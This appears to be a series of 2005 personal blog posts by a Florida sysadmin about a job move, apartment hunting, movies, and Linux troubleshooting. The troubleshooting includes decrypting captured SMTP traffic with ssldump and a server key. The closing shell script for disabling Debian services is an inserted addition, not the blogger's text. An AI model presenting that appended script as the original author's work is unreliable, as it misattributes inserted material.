So I tried what was explained in the above pages. I booted a rescue disk and did:
sfdisk -d /dev/hda | sfdisk --no-reread -H255 /dev/hda
After that, booting continued the 2nd stage of the recovery install. Long story short, my partition table was hosed. I could have just run the above command to fix it, but now I'm sitting through an XP install.
I had a chance to check this out after hearing good reviews about it. It's essentially a journey of a man going mad. When I first heard Sean Penn's character introduce himself as Sam, I thought oh no, can it be this Sam? Fortunately not. I honestly could not watch more than 5 minutes of I am Sam due to being supremely annoyed by Penn.
He was very convincing in this movie, which is ultimately a character study. It's reminiscent of Taxi Driver, and I love such movies. In the end, there is a botched attempt to hijack a plane. It shows Penn reaching his exploding point. He gets in line for the metal detector.. gets scared, leaves, has doubts, then comes back. This scene is actually quite scary, and I couldn't help thinking about September 11. When a person reaches this point, there is no turning back.
At work the IT Director suggested using small form factor PCs for servers. I found this rather intriguing. Think about a stack of cheap brick PCs like the ones sold by Idotpc and Simplified Innovation, instead of a rack full of expensive, large, loud, and hot servers.
Fairly decent brick PCs are running around $500. The storage for such small PCs could be offloaded to a Coraid box. Instead of concentrating on expensive servers, why not make them easily replaceable, such that they can even become almost disposable. Disposable servers... there is something very cool about that.
Maybe even something like a stack of Mac Minis. The only issue is we want to run Linux. We can, but certain support may be lacking. For example, we are using Sangoma T1 cards in Linux boxes. They require a PCI slot and x86. Most likely there is no ATA over Ethernet support on such architectures as well for Coraid.
Could this be the way of the future? Could such small, cheap, and disposable systems replace the monstrous racks of expensive servers?
My new job uses SMTP AUTH over SSL. For some reason Mail.app in OS X was getting authentication errors sending mail. I thought this was maybe a client problem and was busy with other things to look into it. Also I could get by without AUTH just fine. I then switched to Thunderbird and got the same problem. It was beginning to irritate me so I started looking into it further.
I wanted to understand what the client was sending. Normally I could use tcpdump or ethereal, but when the transaction is SSL encrypted it doesn't help much. I did some searching and found ssldump. When given the private SSL key, this can decrypt the packets for you.
I didn't have gcc on OS X, so I couldn't compile ssldump. But I did have tcpdump and ssldump can read pcap files. So I used tcpdump to capture data to a file:
sudo tcpdump -nlp -i en0 -w /tmp/blah.pcap port 25
Then I tried sending mail in Thunderbird. Next I took the blah.pcap file to a Debian box where I installed ssldump (easy as apt-get install ssldump). Then I did:
ssldump -r blah.pcap -k server.key -d
Voila, it got me the AUTH line my mail client was sending. I compared it with the one generated as explained here. Everything looked ok, but the server was rejecting it for some reason.
After further investigation, it turned out there was a misconfiguration on the mail server that was causing this. The steps above helped me rule out a client issue, and ssldump was very helpful.
Well today was my first day at the new company. Things went very smoothly, and everyone is extremely nice and easy to get along with. I work in a group of 6 IT people. I went through a lot of orientation, and understanding the network. My first task is to set up Twiki to put a lot of server documentation online. That'll most of all help me understand everything. The IT director is encouraging everyone in the group to learn Linux (some have Windows background), signing them up for training, etc. Pretty nice, and I helped one with her regular expression exam. I think she passed.
I was given a 15" Powerbook and also Virtual PC to run Windows on OS X. Virtual PC is pretty nice, but slow of course. It is similar in speed to VMware, and it's good for me to have as a sysadmin in order to diagnose Windows issues. So now I'm staring at 2 Powerbooks on my dining table. I just know one day I'm going to take the wrong one to work.
I started using the OS X Mail client, but didn't quite like it. I thought of maybe installing mutt, but then thought about having to set up fetchmail, making it not fetch when offline, or avoiding a cronjob re-awakening out of sleep. I decided to go with Thunderbird, and it is pretty nice on OS X. On the server end they run Exim, which is something I'll have to learn.
I got in office at about 8:30am and left about 5:30pm. I expect those to be normal hours, for IT at least. In the evening at home I did a lot of research on hardware and other work-related stuff. I expect to be doing a lot of that, at least in the beginning. Shit, I haven't even finished unpacking.
Today Adelphia came to my place to install a HDTV tuner and cable modem.
First the TV. I have used Voom for awhile, and even though it had tons of HD channels, I had problems with signal quality. Certain scenes that had lots of action going on resulted in pixelation frequently. Also if there were any clouds in the sky I'd get signal cuts. When I heard Adelphia now has HDTV, I figured I would try it. They were offering all premium channels + HDTV + cable modem for $75/month.
I had made things easy for the technician and prewired component and optical cables ready to be plugged into the tuner box. I also learned that it is a PVR as well, and I must say the pausing live TV feature is quite addictive. There are only a few HD channels (HBO, Starz, Showtime), and only the primary channels (no HBO2 etc), but in general I was impressed with the quality. The PVR even works in HD, and changing channels is MUCH faster than satellite. I watched Out of Time tonight to test it. Looked very good (and not a bad movie).
Next was the cable modem. Again I had everything ready, including Windows XP for the clueless tech. He had to do some configuration directly on the box so I had to disconnect my wireless router. After that, I put the router back in, and all worked flawlessly. It is extremely fast. I was playing with Ubuntu Linux and when it was downloading packages I got rates of 256-280 KB/sec! This blows away the DSL I had. One good test is going to an HTTPS page. These always load up dog slow on slow connections (even DSL), but was extremely fast on cable. Very cool!
The apartment is becoming more likable. This morning I reported some issues such as my dishwasher missing the utensil basket, and the front door lock being difficult to use. Within a few hours someone came out with the basket and fixed the lock. Not bad service. Oh and I found a pretty good Chinese and pizza place close by, so I'm pretty much set.
Between moving and unpacking, I made an effort to go see the movie House of Flying Daggers. This is a beautiful movie. I loved it very much, from the choreography of the fight scenes, the music, and the story. The movie almost makes a 90 degree turn halfway through it. The fight scenes were simply amazing, and very artistic in the Hero sense. They had a scene similar to Crouching Tiger's tree fight, but this one was just much cooler and at least a little more believable (hehe, well not really). Definitely go checkout this movie. It's ultimately a romance, and a great one. It deserves the many awards it won. As usual, I think there were like 4 people in the theatre when I saw it.
I also saw the trailer for Kung Fu Hustle. From the director of Shaolin Soccer, and it looks awesome.
Well I've successfully moved into my new apartment Saturday morning 1/15/05. That evening I went to a co-worker Dennis' bachelor party. It was pretty fun. First we went to Hard Rock Casino for dinner at a restaurant there. That place is HUGE. Then of course the strip joint. We were out pretty late, and I didn't want to drive 1 hour home, so I crashed at his place.
So now it is Sunday evening about 11pm. I have no internet access from my apartment, so I went war driving. I'm now sitting in my car outside Panera Bread, getting a weak, but working wifi signal. It's kinda cold also (for Florida at least): about 55 degrees fahrenheit. Tomorrow is a holiday so I start my new job Tuesday. I should hopefully get my cable modem tomorrow.
The apartment is workable, but kinda small for the shit I have. I may look for another sometime later. It should do for now though, at least until I sell my townhouse.
Well I've packed almost everything except for my DSL hardware and laptop. I'm surrounded by boxes. I thought I lived light. It's amazing how much stuff you think you don't have. Things just start creeping up out of nowhere and you're like, "WTF did I buy this?" and "Do I really need this crap?"
What's kinda scary is I have not seen my new place yet. I've only seen it on paper. They didn't have the model available when I was looking, and I never got a chance to drive to Palm Beach Gardens to check it out. So I have movers coming tomorrow morning. I sure hope I like it.
I'm looking forward to it though. I actually like the fact the community has a gym. There is no gym here and I haven't worked out in awhile. I've been reluctant to jog these days due to unleashed mutts.
I decided to go with cable modem for Internet. Adelphia had a good deal: all movie channels with HDTV and high-speed Internet for $75/month. That's a pretty nice deal.
Hopefully my next blog will be from Palm Beach Gardens, probably from an open wireless network somewhere since I don't get cable modem until Monday.
Today was my last day at Z-Kat as a Systems Administrator. I'm moving on to a new job in Palm Beach Gardens. I believe we have found a good replacement for me at Z-Kat, and things should go smoothly.
I was taken out to lunch by a bunch of co-workers to Dave and Buster's. The CFO says to me afterwards, "So this is all a joke right? Ok ok, you got us. You're not leaving right?" Unfortunately no, but he was a cool guy. I played my last game of foosball (and won). I spent all day putting finishing touches on all of the sysadmin documentation I could come up with. I did a bit of cleanup, like killing stray Call of Duty servers. Luckily things are kinda slow right now at Z-Kat, so the new sysadmin should have some time to get up to speed.
I said my goodbyes to everyone. It was a fun time there. It was the first job where I worked mostly with software developers, and can say I learned some cool things. There is also something that I'm taking with me from Z-Kat, that I can never forget.
I've decided to ditch Debian Testing on my home desktop system. I'm tired of downloading 200megs of updated packages every time I boot Linux. It was turning out to be very risky, because many times some package would break. I thought it was fun, because I would have the challenge to figure out how to fix it. Tonight I just got fed up. This particular instance resulted in my MySQL database not starting:
Jan 12 22:41:27 localhost mysqld[1607]: 050112 22:41:27 [ERROR] bdb: unable to initialize mutex: Function not implemented
Jan 12 22:41:27 localhost mysqld[1607]: 050112 22:41:27 [ERROR] bdb: process-private: unable to initialize environment lock: Function not implemented
Debian Testing is changing so much it's just not worth it for me. I think Stable is the only one to run, and that is better for servers, not desktops. I'm going to switch to Ubuntu Linux. I've heard good things about it, and it is based on Debian.
This morning I'm sitting at stoplights reading Linux Journal and came across an ad for Coraid, a company making 'Ethernet Disk Drives'. This uses ATA over Ethernet, and currently there are open source drivers for Linux (no Windows it seems). From what I understand, the drives will appear just like normal attached drives on Linux systems. You can then do software RAID, etc, on Linux if needed. Multiple systems can even see the same drives in read-only for backup purposes. There is no TCP/IP overhead, and it seems reasonable that this would work well with a gigabit switch. They even say it works good on 100mb.
It looks like a very cool storage solution, much cheaper than the big SANs. They are addressing users looking for storage without the need for big servers. They use standard IDE drives which can be purchased cheap. Backups would be a cinch with the hot swappable drives.
I've been interviewing candidates at my current job. I recently talked with a recruiter and couldn't believe the fees they charge. Here is a real example.
One candidate wanted a salary of 60k. Through the recruiter, we would pay them $52 per hour. Let's see what this comes out to. Assuming 40 hours a week, 52 weeks per year, this salary would actually be 108k! The recruiting company would make 48k off of this candidate.
That was their first option. The second one was 30% of salary for direct hire. That's 18k initially up front.
What a ripoff! Be careful if you work through a recruiter. Keep in mind how much they are stealing from your salary.
Well I've been slowly doing packing for my move on January 15. My previous mover, Luis Moving, did a pretty good job. They only work in Florida, and were not available for my move date.
I instead selected Nice Jewish Boy Moving. We'll see how they work out. Moving is a bitch. I need to get rid of the junk I have. A friend of mine actually used UPS as a mover. Now that's what I call travelling light.
Meanwhile I have to keep my current home rather clean because realtors come and go during the day. You lose some privacy when your home is on the market. A realtor actually came interested in buying the place for herself, which may be a good sign. I'm hoping to make about 20k on the sale of my place. Not that great, as selling my last home 2 years ago got me 50k. Homes are too overpriced in FL these days, and it is very difficult to determine what will be good investment and what will not.
My webhosting provider does not give shell access, but allows you to use a web interface for various administrative tasks. It has a file manager that is pretty nifty.
I was trying to install Twiki from their zipped distribution, and accidentally unzipped it in my website root. It ended up clobbering my index.html. That zip should really be changed to be like their tar, where it creates a subdirectory first. Luckily I had a copy of the index.html somewhere, but my web page was broken for a day before I even noticed it.
Anyhow, I had no luck getting Twiki running because I needed more control of the Apache configuration file. It probably can be done, but I just didn't invest much time in it. Instead I installed Mediawiki. It was a pretty simple install and enough for me. I've kept the wiki private for now, and use it just for some personal notes.
I've been doing some research on Single Sign On (SSO) systems for a possible project at my new job. Such a system lets you log in once, and be automatically authenticated for everything else without requiring further passwords. They are also interested in implementing two-factor authentication, such as SecurID.
The most popular system is Kerberos. This is a tried and tested SSO system, and a great introduction is given in this dialogue. Now this all works great with Unix (Linux, OS X), but problems arise when interoperating with Windows.
Now if I were implementing this, I'd want the Kerberos server(s) running on Linux. Windows 2000's Active Directory actually uses Kerberos, but they've added extra things to the protocol that are proprietary that the Unix servers cannot support. Basically, the Windows clients need to have the SID and some sort of certificate for the user logging in, and this is what Microsoft has added to a Kerberos ticket. There are 2 ways you can use Windows with a Unix Kerberos server:
Neither of these solutions are very appealing to me, but if I were to choose, I would pick the first method. This is what major universities appear to be doing from what I've read. Samba unfortunately cannot be an Active Directory server yet.
I was kinda excited about Kerberos until I found out these limitations. I started looking at other alternatives, and found pGina. This is a replacement login DLL for Windows systems that has plugins to authenticate via many methods, including SecurID. This actually might be the better method for centralized authentication.
However, there is talk of using an Exchange server, and I know that won't play well with this. And really this is not a SSO system like Kerberos, it's just centralized authentication.
Exchange will, however, work fine with Active Directory. And there are many people that have set up Linux systems to authenticate to AD. This would suck, but might be the only other option.
Today I went searching for an apartment. Let's see, where to begin...
The first place I went to was Flagler Pointe. I was very optimistic about seeing this place. Just driving there, along the intracoastal, was beautiful. When I got there, the security guard was much nicer than usual ones, letting me in to park in private covered parking. As I'm walking up to the lobby, I hear some very good piano playing, and when I tell the lobby attendant that I'm here to see Elena (a realtor), he says it's the "beautiful girl playing the piano." All of this got me very excited.
I ended up looking at 4 or 5 units, only one of which I really liked. The main one I was going to see, a 1 BR top floor "penthouse" was too small for me: 863 sq ft. It was overlooking the water, but also a parking lot. They wanted $1300 for it. The one I really liked had a view overlooking the courtyard/pool area AND the intracoastal. It had oak wood living room floor, carpeted bedrooms, upgraded kitchen and appliances. It was VERY beautiful, but too expensive: $1800. So Flagler Pointe was out for me.
I ended up finding a pretty good apartment close to my job. I got a 2 BR, 1300 sq ft for $1200. It's not the greatest place, but still fairly nice. It's called San Merano, and I got the Doral model.
So my selection is done, and hopefully I move in Jan 15. Meanwhile, I've put my townhouse on the market.
With my new job I need to find a place closer to Palm Beach Gardens. I've been looking at some rentals, and originally thought of renting out my townhouse in Fort Lauderdale. It turns out there are many units for rent in my neighborhood, and I'd have a tough time competing with them. So now I'm looking to sell. I tried selling awhile back, but did not get any good offers. Time to try again.
Last weekend I did some apartment hunting and considered Legacy Place. That's pretty nice and about 5 minutes away from work.
This weekend I'm planning to look at Flagler Pointe. This is about 20 minutes away from work, but is on the intracoastal and looks very nice. Another one is Park Place, a bit west, and about 15 minutes away from work. Finally, there is the not-so-exciting Mira Flores Apartments, which is about 5 minutes away from work.
Ideally I'd like to move before I start work. But this is risky. If I don't sell my townhouse, I will be stuck with paying for 2 places. If I don't move, I'll be driving 1 hour every morning from Fort Lauderdale (with a leased car even). Neither of these are very good scenarios.
A friend of mine told me about an RSS aggregator that emails you called rss2email. Pretty cool, and written in Python as well. The problem I have is I don't have a machine to run such a script on.
In the latest Linux Journal there was an article about Bloglines. This is a free web service that lets you subscribe to RSS feeds. It even has a public API to use in scripts. It's very cool, and I've started using it to keep track of blogs.
Well it seems Microsoft has released (or rather rebranded) a spyware removal tool. Haven't checked it out, but might be worth it.
What I found rather funny was the spyware education video linked above. My favorite quote:
On my "How dangerous is it?" scale, I give it a medium. Spyware is like having an intruder in your home.
Yeah, having an intruder in my home, I would consider that medium risk also. I also loved how she explains how much better it would be if spyware companies had license agreements we could read and accept. Then we'd never have spyware. Microsoft is magnificent at blaming users for bugs in their OS.
I've set up a new blog for Prashant Chopra, a co-worker of mine. He's moving to California to take a cool job there. You can reach his blog from the Prashant tab at the top.
Well I've been interviewing candidates to replace me at my current employer. It has been an interesting experience. We are looking for someone with good Linux skills, and I posted the job on the Florida Linux User's Group job mailing list. I got quite a few responses.
I have a pretty tough interview process, consisting of 85 or so technical questions consisting of things like coding small programs, troubleshooting, networking, binary arithmetic, and other topics. I purposefully scatter the questions around, so that the topic jumps around quite a bit, and maybe comes back to a topic already discussed. Some people get stunned by this, but it's my way of determining how this person deals with completely different problems one after another. Part of it involves also admitting defeat, in that they must now forget about the previous problem they got wrong, and think about a new problem. A few candidates would even have a eureka moment and realize an answer to a previous question. That sort of shows them actually multitasking. That's really what sysadmin involves.
I don't expect anyone to get all of the answers, and so far the highest score anyone has got is 81%. I was very impressed with this person. The lowest score so far is 33%.
I try my best not to humiliate anyone. But I don't make it easy for them either. If you claim to know something or have it on your resume, I'm going to ask you about it. The problem I have with candidates is the blatant lying on resumes. I had one person claim to know PERL but could not tell me what the split() function does. Then another claiming to know SQL, but could not give me an example of using a select statement. Then another claiming to know bash but could not tell me how to set an environment variable.
Please, please, please make sure you know more than just what the acronyms stand for on your resume. Personality and confidence are great, but if you cannot back up the knowledge you claim to have, you will be considered more a liar than anything else.
This weekend I had checked out The Incredibles again. Great movie, but this blog is not a review. After reading a friend's blog, I thought about how crappy movie theatres are becoming. The AMC Sheridan 12 is probably the worst fucking theatre I've ever been in. Every movie I've watched here has had one stupid problem after another.
First you have the near catatonic popcorn vendors who are about as speedy as Night of the Living Dead extras. No problem, I know they hate their job. I'll cut them some slack. But I sensed the aggravation of the rest of the people in the line, but no one spoke up.
Then I get in the theatre and during the trailers the film slowly spun down like an unplugged record player to a complete stop. A few minutes later it comes back, but there are all sorts of artifacts on the screen. No one seems to notice. Ok, now I think I may be setting a higher standard since I'm so used to HDTV. So I'll ignore them.. then I notice the focus is pretty bad. Now on a CG film, being out of focus stands out A LOT more than non-CG.
At this point, I'm expecting the whole experience to be crap. Luckily, I'm using an AMC gift card (i.e. I didn't have to pay for this shit). Next, throughout the movie the center channel was completely fucked up, coming on and off with loud static noises when it would do so. I'm looking around, and no one is doing shit. It's like people are coming from their black and white antenna-based TVs at home to this crap! WTF?
Finally I go out to complain, and to my relief someone has already complained about the sound. Their solution? Turn off the center channel. Yeah that sounds fucking great.
Seeing a movie like this makes me want to pirate it! Fix your fucking movie theatres please!
As much as I enjoy a fresh pill of Cialis every day to give me that pep in the morning, I had to remove the recent/top referers links because of referer spamming.
I've been testing a few things on Debian that require additional daemons to be started (ldap, apache, samba, exim). I left them on and my bootup was getting kinda slow. So began my quest to understand the Debian initscripts.
Generally they are the same as Red Hat, with /etc/rcN.d/ directories corresponding to the runlevels. Now what I wanted to do was disable the inetd service from starting. On Red Hat, I would do something like:
chkconfig --level 2345 inetd off
How to do it in Debian? After a bit of searching on Google, I came across some recommendations to do:
update-rc.d -f inetd remove
Which actually works, but you lose the original startup order. Let's say inetd used 33 (i.e. S33inetd), the 33 appears not to be stored anywhere. On Red Hat, this was stored in the rc script itself for chkconfig. The only way I could restore this information is re-installing the package, which is kinda lame. Worse, if ever the inetd package is updated, the initscripts would be recreated! This is just retarded and I was beginning to see that update-rc.d should not be used for administration.
I did some more research and it turns out the remove method of update-rc.d is not recommended for what I'm trying to do. In fact, the Debian Security HOWTO cautions against it as well. That text and some users recommend that the /etc/rcN.d/S??service script be removed. Ok I can do that, but how does that remember the startup order? I still have to resort to re-installing the package to get it in the original state.
Ugh, I hate when only half of my question is answered. Yes, Debian truly is an elitist distro.
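One way to switch a service off without losing its start order, as an added example that is not part of the original post: rename the SNN start links to K links instead of removing them, and record the original names so they can be put back. Leaving links in place also matters because update-rc.d, per its man page, does nothing when links for the name already exist. The function names and the state file are hypothetical, and the script works on a constructed tree in a temp directory rather than the real /etc.

```shell
#!/bin/sh
# Added example. ETC is the directory holding rc2.d..rc5.d (/etc on a real
# system); STATE is a hypothetical file that records the original link names.

# Build a constructed sandbox tree so nothing touches the real /etc.
make_demo_tree() {
    t=$(mktemp -d) || return 1
    mkdir "$t/init.d"; : > "$t/init.d/inetd"; : > "$t/init.d/exim4"
    for rl in 2 3 4 5; do
        mkdir "$t/rc$rl.d"
        ln -s ../init.d/inetd "$t/rc$rl.d/S33inetd"
        ln -s ../init.d/exim4 "$t/rc$rl.d/S20exim4"
    done
    echo "$t"
}

# svc_disable ETC SERVICE STATE
# Rename each SNNservice start link in runlevels 2-5 to KMMservice (MM = 100-NN)
# and append "runlevel old new" to STATE, so the start order is not lost.
svc_disable() {
    etc=$1; svc=$2; state=$3
    for rl in 2 3 4 5; do
        for link in "$etc/rc$rl.d"/S[0-9][0-9]"$svc"; do
            [ -L "$link" ] || continue        # glob matched nothing
            old=${link##*/}
            nn=${old#S}; nn=${nn%"$svc"}
            mm=$((100 - ${nn#0}))             # drop a leading 0 so 08 is not octal
            if [ "$mm" -gt 99 ]; then mm=99; fi
            new=$(printf 'K%02d%s' "$mm" "$svc")
            mv "$link" "$etc/rc$rl.d/$new"
            printf '%s %s %s\n' "$rl" "$old" "$new" >> "$state"
        done
    done
    return 0
}

# svc_enable ETC SERVICE STATE
# Rename the recorded K links back to their original SNN names and keep only
# other services' entries in STATE.
svc_enable() {
    etc=$1; svc=$2; state=$3
    [ -f "$state" ] || return 0
    : > "$state.tmp"
    while read -r rl old new; do
        case $old in
            S[0-9][0-9]"$svc")
                if [ -L "$etc/rc$rl.d/$new" ]; then
                    mv "$etc/rc$rl.d/$new" "$etc/rc$rl.d/$old"
                fi ;;
            *)  printf '%s %s %s\n' "$rl" "$old" "$new" >> "$state.tmp" ;;
        esac
    done < "$state"
    mv "$state.tmp" "$state"
}

# svc_links ETC SERVICE: print every rcN.d link for SERVICE, one per line.
svc_links() {
    ( cd "$1" || exit 1
      for f in rc[2-5].d/[SK][0-9][0-9]"$2"; do
          if [ -L "$f" ]; then echo "$f"; fi
      done )
}
```

On a real system the same renames need root, and the state file should live somewhere that survives package upgrades.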